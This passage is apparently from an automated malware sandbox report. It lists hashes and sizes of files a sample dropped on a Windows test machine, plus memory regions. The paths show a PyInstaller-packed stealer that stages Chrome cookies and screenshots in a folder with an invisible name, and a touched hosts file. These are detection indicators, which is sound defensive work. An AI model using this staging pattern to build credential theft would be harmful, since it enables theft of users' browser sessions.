                                                                      08b000c3d990bc018fcb91a1e175e06e

                                                                      SHA1

                                                                      bd0ce09bb3414d11c91316113c2becfff0862d0d

                                                                      SHA256

                                                                      135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

                                                                      SHA512

                                                                      8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\libssl-3.dll

                                                                      Filesize

                                                                      221KB

                                                                      MD5

                                                                      b2e766f5cf6f9d4dcbe8537bc5bded2f

                                                                      SHA1

                                                                      331269521ce1ab76799e69e9ae1c3b565a838574

                                                                      SHA256

                                                                      3cc6828e7047c6a7eff517aa434403ea42128c8595bf44126765b38200b87ce4

                                                                      SHA512

                                                                      5233c8230497aadb9393c3ee5049e4ab99766a68f82091fe32393ee980887ebd4503bf88847c462c40c3fc786f8d179dac5cb343b980944ade43bc6646f5ad5a

                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\python312.dll

                                                                      Filesize

                                                                      1.7MB

                                                                      MD5

                                                                      6f7c42579f6c2b45fe866747127aef09

                                                                      SHA1

                                                                      b9487372fe3ed61022e52cc8dbd37e6640e87723

                                                                      SHA256

                                                                      07642b6a3d99ce88cff790087ac4e2ba0b2da1100cf1897f36e096427b580ee5

                                                                      SHA512

                                                                      aadf06fd6b4e14f600b0a614001b8c31e42d71801adec7c9c177dcbb4956e27617fa45ba477260a7e06d2ca4979ed5acc60311258427ee085e8025b61452acec

                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\rar.exe

                                                                      Filesize

                                                                      615KB

                                                                      MD5

                                                                      9c223575ae5b9544bc3d69ac6364f75e

                                                                      SHA1

                                                                      8a1cb5ee02c742e937febc57609ac312247ba386

                                                                      SHA256

                                                                      90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

                                                                      SHA512

                                                                      57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\rarreg.key

                                                                      Filesize

                                                                      456B

                                                                      MD5

                                                                      4531984cad7dacf24c086830068c4abe

                                                                      SHA1

                                                                      fa7c8c46677af01a83cf652ef30ba39b2aae14c3

                                                                      SHA256

                                                                      58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

                                                                      SHA512

                                                                      00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\select.pyd

                                                                      Filesize

                                                                      25KB

                                                                      MD5

                                                                      9a59688220e54fec39a6f81da8d0bfb0

                                                                      SHA1

                                                                      07a3454b21a831916e3906e7944232512cf65bc1

                                                                      SHA256

                                                                      50e969e062a80917f575af0fe47c458586ebce003cf50231c4c3708da8b5f105

                                                                      SHA512

                                                                      7cb7a039a0a1a7111c709d22f6e83ab4cb8714448daddb4d938c0d4692fa8589baa1f80a6a0eb626424b84212da59275a39e314a0e6ccaae8f0be1de4b7b994e

                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\sqlite3.dll

                                                                      Filesize

                                                                      644KB

                                                                      MD5

                                                                      de562be5de5b7f3a441264d4f0833694

                                                                      SHA1

                                                                      b55717b5cd59f5f34965bc92731a6cea8a65fd20

                                                                      SHA256

                                                                      b8273963f55e7bf516f129ac7cf7b41790dffa0f4a16b81b5b6e300aa0142f7e

                                                                      SHA512

                                                                      baf1fbdd51d66ea473b56c82e181582bf288129c7698fc058f043ccfbcec1a28f69d89d3cfbfee77a16d3a3fd880b3b18fd46f98744190d5b229b06cf07c975a

                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI42002\unicodedata.pyd

                                                                      Filesize

                                                                      296KB

                                                                      MD5

                                                                      2730c614d83b6a018005778d32f4faca

                                                                      SHA1

                                                                      611735e993c3cc73ecccb03603e329d513d5678a

                                                                      SHA256

                                                                      baa76f6fd87d7a79148e32d3ae38f1d1fe5a98804b86e636902559e87b316e48

                                                                      SHA512

                                                                      9b391a62429cd4c40a34740ddb04fa4d8130f69f970bb94fa815485b9da788bca28681ec7d19e493af7c99a2f3bf92c3b53339ef43ad815032d4991f99cc8c45

                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jbpb5ilv.yq4.ps1

                                                                      Filesize

                                                                      60B

                                                                      MD5

                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                      SHA1

                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                      SHA256

                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                      SHA512

                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                    • C:\Users\Admin\AppData\Local\Temp\afsdkbfj\afsdkbfj.dll

                                                                      Filesize

                                                                      4KB

                                                                      MD5

                                                                      5d0ff33f4cd37441e80e70bed2243027

                                                                      SHA1

                                                                      55b615ad1b8d6ad26feb9b9e0ab2ea13fe502d5d

                                                                      SHA256

                                                                      5b78f71351fdd40a949c096c0a63db694160f8f12d29f3a25bb3376933cc4fac

                                                                      SHA512

                                                                      6c8c0f43634349fb637f99d69726ace8ccb391ff284024aaf2cd93ffa8c8f98be474b867ec5ff2b29e143d484afa133f6ddd400bbc322f8f9ab657744a88387c

                                                                    • C:\Users\Admin\AppData\Local\Temp\bound.exe

                                                                      Filesize

                                                                      800KB

                                                                      MD5

                                                                      2a4dcf20b82896be94eb538260c5fb93

                                                                      SHA1

                                                                      21f232c2fd8132f8677e53258562ad98b455e679

                                                                      SHA256

                                                                      ebbcb489171abfcfce56554dbaeacd22a15838391cbc7c756db02995129def5a

                                                                      SHA512

                                                                      4f1164b2312fb94b7030d6eb6aa9f3502912ffa33505f156443570fc964bfd3bb21ded3cf84092054e07346d2dce83a0907ba33f4ba39ad3fe7a78e836efe288

                                                                    • C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi

                                                                      Filesize

                                                                      30.1MB

                                                                      MD5

                                                                      0e4e9aa41d24221b29b19ba96c1a64d0

                                                                      SHA1

                                                                      231ade3d5a586c0eb4441c8dbfe9007dc26b2872

                                                                      SHA256

                                                                      5bfb6f3ab89e198539408f7e0e8ec0b0bd5efe8898573ec05b381228efb45a5d

                                                                      SHA512

                                                                      e6f27aecead72dffecbeaad46ebdf4b1fd3dbcddd1f6076ba183b654e4e32d30f7af1236bf2e04459186e993356fe2041840671be73612c8afed985c2c608913

                                                                    • C:\Users\Admin\AppData\Local\Temp\‍‍‌      ‌\Credentials\Chrome\Chrome Cookies.txt

                                                                      Filesize

                                                                      258B

                                                                      MD5

                                                                      e5df16f20a191398cf9cd2b82ec92cc1

                                                                      SHA1

                                                                      8f1258f9d3b68bc230aadadb590d98818c63c216

                                                                      SHA256

                                                                      6d4068d48f180c35a3482528586c4a5ebd1206d8dff7c746f5886643818c8b44

                                                                      SHA512

                                                                      60c342a7d2caa5f5500ce68324e69e548b5f18107b433fb47cd3cca10f14a361cd452df55f37bba1bb189ee32c273b9256e97f6d87c0bf85bdc0e3e43f213dd7

                                                                    • C:\Users\Admin\AppData\Local\Temp\‍‍‌      ‌\Display (1).png

                                                                      Filesize

                                                                      222KB

                                                                      MD5

                                                                      6715e8fdd3dfca3bdb6e906e459f4889

                                                                      SHA1

                                                                      d05b02dfa6f3f17bb28333ba2b0d722c0db18087

                                                                      SHA256

                                                                      e2b2d047b7184ada77fb04019875b0d09c001a1e7093aaf3c46189a2343feca2

                                                                      SHA512

                                                                      7a5615c0c3d3fbe9f2982cc070f6bafb2f6de124a7eb49fd8c2296f2a5de2ade148e9c033fd78e095ec4b6fb2aeef9d7efa60c6e20fbe2bca76f104f110489ff

                                                                    • C:\Windows\Installer\MSI1EB4.tmp

                                                                      Filesize

                                                                      211KB

                                                                      MD5

                                                                      a3ae5d86ecf38db9427359ea37a5f646

                                                                      SHA1

                                                                      eb4cb5ff520717038adadcc5e1ef8f7c24b27a90

                                                                      SHA256

                                                                      c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74

                                                                      SHA512

                                                                      96ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0

                                                                    • C:\Windows\Installer\MSI578C.tmp

                                                                      Filesize

                                                                      122KB

                                                                      MD5

                                                                      9fe9b0ecaea0324ad99036a91db03ebb

                                                                      SHA1

                                                                      144068c64ec06fc08eadfcca0a014a44b95bb908

                                                                      SHA256

                                                                      e2cce64916e405976a1d0c522b44527d12b1cba19de25da62121cf5f41d184c9

                                                                      SHA512

                                                                      906641a73d69a841218ae90b83714a05af3537eec8ad1d761f58ac365cf005bdd74ad88f71c4437aaa126ac74fa46bcad424d17c746ab197eec2caa1bd838176

                                                                    • C:\Windows\System32\drivers\etc\hosts

                                                                      Filesize

                                                                      2KB

                                                                      MD5

                                                                      f99e42cdd8b2f9f1a3c062fe9cf6e131

                                                                      SHA1

                                                                      e32bdcab8da0e3cdafb6e3876763cee002ab7307

                                                                      SHA256

                                                                      a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

                                                                      SHA512

                                                                      c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\afsdkbfj\CSCDC551DAD260A40D7A1EEAA9176D3FC8E.TMP

                                                                      Filesize

                                                                      652B

                                                                      MD5

                                                                      bb3d727716e833c35ee8f9687a27df87

                                                                      SHA1

                                                                      5763505e57b094b1f089ce73c2a417dafb7912a5

                                                                      SHA256

                                                                      74d30724c968e5df17fb89695ef86981dab8ac92fb7db0abeeb9b8fe1b434b79

                                                                      SHA512

                                                                      2cd5ee98f22770080e41359f508e51df1645c230128f5791b67bd793db0cfe9b414a1a7746aaf0fd9b9f780466923ff27f441fc60640bc60fd397226991f4790

                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\afsdkbfj\afsdkbfj.0.cs

                                                                      Filesize

                                                                      1004B

                                                                      MD5

                                                                      c76055a0388b713a1eabe16130684dc3

                                                                      SHA1

                                                                      ee11e84cf41d8a43340f7102e17660072906c402

                                                                      SHA256

                                                                      8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                      SHA512

                                                                      22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\afsdkbfj\afsdkbfj.cmdline

                                                                      Filesize

                                                                      607B

                                                                      MD5

                                                                      7b07d0581824802b603ca0d1adf6d0d3

                                                                      SHA1

                                                                      a3fe975676077a1d471c4b74bc528dbd78f317d1

                                                                      SHA256

                                                                      6cd11d11197f1758bb8309ccf5d8bc930ec9553167b432cb4fd8c064155ce601

                                                                      SHA512

                                                                      ddec903616af1bc9bd10663ea3b04c492680144341841097ba70216be92e5224bc5691cddfb8c2a4eee66ccc52779517f73c474b1096a69e88173ffc2aba34c9

                                                                    • memory/1880-105-0x000001CC2C0A0000-0x000001CC2C16E000-memory.dmp

                                                                      Filesize

                                                                      824KB

                                                                    • memory/1880-313-0x000001CC2DD90000-0x000001CC2DDC5000-memory.dmp

                                                                      Filesize

                                                                      212KB

                                                                    • memory/2588-2670-0x00000227431E0000-0x00000227431F2000-memory.dmp

                                                                      Filesize

                                                                      72KB

                                                                    • memory/2588-315-0x00000227288E0000-0x00000227289AE000-memory.dmp

                                                                      Filesize

                                                                      824KB

                                                                    • memory/2588-2668-0x0000022742FF0000-0x0000022742FFA000-memory.dmp

                                                                      Filesize

                                                                      40KB

                                                                    • memory/3264-3088-0x0000012A35820000-0x0000012A358D2000-memory.dmp

                                                                      Filesize

                                                                      712KB

                                                                    • memory/3264-3084-0x0000012A1AFE0000-0x0000012A1B004000-memory.dmp

                                                                      Filesize

                                                                      144KB

                                                                    • memory/3264-3085-0x0000012A35BB0000-0x0000012A360EC000-memory.dmp

                                                                      Filesize

                                                                      5.2MB

                                                                    • memory/3264-3087-0x0000012A35760000-0x0000012A3581A000-memory.dmp

                                                                      Filesize

                                                                      744KB

                                                                    • memory/4056-90-0x0000028472130000-0x0000028472152000-memory.dmp

                                                                      Filesize

                                                                      136KB

                                                                    • memory/4476-60-0x00007FFB33740000-0x00007FFB33764000-memory.dmp

                                                                      Filesize

                                                                      144KB

                                                                    • memory/4476-236-0x00007FFB28FE0000-0x00007FFB29513000-memory.dmp

                                                                      Filesize

                                                                      5.2MB

                                                                    • memory/4476-297-0x00007FFB38D60000-0x00007FFB38D79000-memory.dmp

                                                                      Filesize

                                                                      100KB

                                                                    • memory/4476-296-0x00007FFB295F0000-0x00007FFB2976F000-memory.dmp

                                                                      Filesize

                                                                      1.5MB

                                                                    • memory/4476-295-0x00007FFB33740000-0x00007FFB33764000-memory.dmp

                                                                      Filesize

                                                                      144KB

                                                                    • memory/4476-294-0x00007FFB39070000-0x00007FFB3908A000-memory.dmp

                                                                      Filesize

                                                                      104KB

                                                                    • memory/4476-293-0x00007FFB398E0000-0x00007FFB3990D000-memory.dmp

                                                                      Filesize

                                                                      180KB

                                                                    • memory/4476-285-0x00007FFB28FE0000-0x00007FFB29513000-memory.dmp

                                                                      Filesize

                                                                      5.2MB

                                                                    • memory/4476-290-0x00007FFB425A0000-0x00007FFB425AF000-memory.dmp

                                                                      Filesize

                                                                      60KB

                                                                    • memory/4476-289-0x00007FFB29C80000-0x00007FFB29D9A000-memory.dmp

                                                                      Filesize

                                                                      1.1MB

                                                                    • memory/4476-288-0x00007FFB39B20000-0x00007FFB39B2D000-memory.dmp

                                                                      Filesize

                                                                      52KB

                                                                    • memory/4476-287-0x00007FFB3D090000-0x00007FFB3D0A4000-memory.dmp

                                                                      Filesize

                                                                      80KB

                                                                    • memory/4476-291-0x00007FFB3B3E0000-0x00007FFB3B405000-memory.dmp

                                                                      Filesize

                                                                      148KB

                                                                    • memory/4476-300-0x00007FFB2A010000-0x00007FFB2A6D5000-memory.dmp

                                                                      Filesize

                                                                      6.8MB

                                                                    • memory/4476-299-0x00007FFB30080000-0x00007FFB300B3000-memory.dmp

                                                                      Filesize

                                                                      204KB

                                                                    • memory/4476-292-0x00007FFB28F10000-0x00007FFB28FDE000-memory.dmp

                                                                      Filesize

                                                                      824KB

                                                                    • memory/4476-260-0x00007FFB3B3E0000-0x00007FFB3B405000-memory.dmp

                                                                      Filesize

                                                                      148KB

                                                                    • memory/4476-259-0x00007FFB2A010000-0x00007FFB2A6D5000-memory.dmp

                                                                      Filesize

                                                                      6.8MB

                                                                    • memory/4476-274-0x00007FFB28F10000-0x00007FFB28FDE000-memory.dmp

                                                                      Filesize

                                                                      824KB

                                                                    • memory/4476-265-0x00007FFB295F0000-0x00007FFB2976F000-memory.dmp

                                                                      Filesize

                                                                      1.5MB

                                                                    • memory/4476-235-0x00007FFB30080000-0x00007FFB300B3000-memory.dmp

                                                                      Filesize

                                                                      204KB

                                                                    • memory/4476-298-0x00007FFB39D60000-0x00007FFB39D6D000-memory.dmp

                                                                      Filesize

                                                                      52KB

                                                                    • memory/4476-26-0x00007FFB2A010000-0x00007FFB2A6D5000-memory.dmp

                                                                      Filesize

                                                                      6.8MB

                                                                    • memory/4476-146-0x00007FFB38D60000-0x00007FFB38D79000-memory.dmp

                                                                      Filesize

                                                                      100KB

                                                                    • memory/4476-115-0x00007FFB33740000-0x00007FFB33764000-memory.dmp

                                                                      Filesize

                                                                      144KB

                                                                    • memory/4476-81-0x00007FFB29C80000-0x00007FFB29D9A000-memory.dmp

                                                                      Filesize

                                                                      1.1MB

                                                                    • memory/4476-78-0x00007FFB39B20000-0x00007FFB39B2D000-memory.dmp

                                                                      Filesize

                                                                      52KB

                                                                    • memory/4476-76-0x00007FFB3D090000-0x00007FFB3D0A4000-memory.dmp

                                                                      Filesize

                                                                      80KB

                                                                    • memory/4476-68-0x00007FFB2A010000-0x00007FFB2A6D5000-memory.dmp

                                                                      Filesize

                                                                      6.8MB

                                                                    • memory/4476-70-0x00007FFB30080000-0x00007FFB300B3000-memory.dmp

                                                                      Filesize

                                                                      204KB

                                                                    • memory/4476-72-0x00007FFB28FE0000-0x00007FFB29513000-memory.dmp

                                                                      Filesize

                                                                      5.2MB

                                                                    • memory/4476-73-0x00007FFB3B3E0000-0x00007FFB3B405000-memory.dmp

                                                                      Filesize

                                                                      148KB

                                                                    • memory/4476-74-0x00007FFB28F10000-0x00007FFB28FDE000-memory.dmp

                                                                      Filesize

                                                                      824KB

                                                                    • memory/4476-66-0x00007FFB39D60000-0x00007FFB39D6D000-memory.dmp

                                                                      Filesize

                                                                      52KB

                                                                    • memory/4476-64-0x00007FFB38D60000-0x00007FFB38D79000-memory.dmp

                                                                      Filesize

                                                                      100KB

                                                                    • memory/4476-62-0x00007FFB295F0000-0x00007FFB2976F000-memory.dmp

                                                                      Filesize

                                                                      1.5MB

                                                                    • memory/4476-58-0x00007FFB39070000-0x00007FFB3908A000-memory.dmp

                                                                      Filesize

                                                                      104KB

                                                                    • memory/4476-56-0x00007FFB398E0000-0x00007FFB3990D000-memory.dmp

                                                                      Filesize

                                                                      180KB

                                                                    • memory/4476-49-0x00007FFB3B3E0000-0x00007FFB3B405000-memory.dmp

                                                                      Filesize

                                                                      148KB

                                                                    • memory/4476-50-0x00007FFB425A0000-0x00007FFB425AF000-memory.dmp

                                                                      Filesize

                                                                      60KB

                                                                    • memory/4764-161-0x0000024859500000-0x0000024859508000-memory.dmp

                                                                      Filesize

                                                                      32KB